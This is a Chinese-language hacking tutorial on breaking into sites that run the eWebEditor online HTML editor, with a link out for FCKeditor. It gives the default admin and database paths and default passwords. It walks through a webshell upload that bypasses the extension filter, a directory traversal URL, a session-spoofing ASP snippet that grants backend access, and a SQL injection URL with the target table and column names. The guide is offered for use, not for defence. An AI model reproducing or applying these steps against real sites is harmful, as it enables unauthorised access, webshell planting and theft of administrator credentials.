网上常用的编辑器有ewebeditor,FCK,DotNetTextBox等,这里只介绍几个常用的。
Ewebeditor:基于浏览器的,所见即所得的在线HTML编辑器
默认后台:ewebeditor/admin_login.asp
默认数据库:ewebeditor/db/ewebeditor.mdb;
ewebeditor/db/ewebeditor.asa
ewebeditor/db/ewebeditor.asp
ewebeditor/db/#ewebeditor.mdb
ewebeditor/db/#ewebeditor.asa
ewebeditor/db/!@#ewebeditor.asp
ewebeditor/db/ewebeditor1033.mdb
默认账号密码:admin admin/admin888/admin999/admin1/admin000
找到后台后,我们可以先用默认账号密码尝试登陆,如果没有进去,那么我们可以去下载数据库文件,然后去查找管理员的账号密码
1)getshell:
登陆后台,点开样式管理,随意找一个样式打开,在图片类型中添加aaspsp(因为编辑器会过滤asp后缀),接下来就是我们熟悉的上传一句话木马了。
2)遍历目录漏洞:2.8.0存在该漏洞
上传文件管理处,有一个样式目录:
http://xxx.xxx.com/ewebeditor/admin_uploadfile.asp?id=14&dir=.. /.. 在id=14后添加绿色部分
然后你就可以看到整个的网站文件了
3)利用webEbeditor session欺骗进入后台
漏洞文件:Aadmin_Private.asp
新建一个amxking.asp文件,内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问该文件,在去访问后台任意文件,就都可以看到了。
# 4)2.7.0注入漏洞
http://www.0dayhack.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用穿山甲进行猜解,对此进行注入取得账号密码。
FCKeditor编辑器:
这个编辑器的漏洞下面这个博客讲的很细致,我就不再多做废话了:
https://blog.csdn.net/lizhengnanhua/article/details/38451737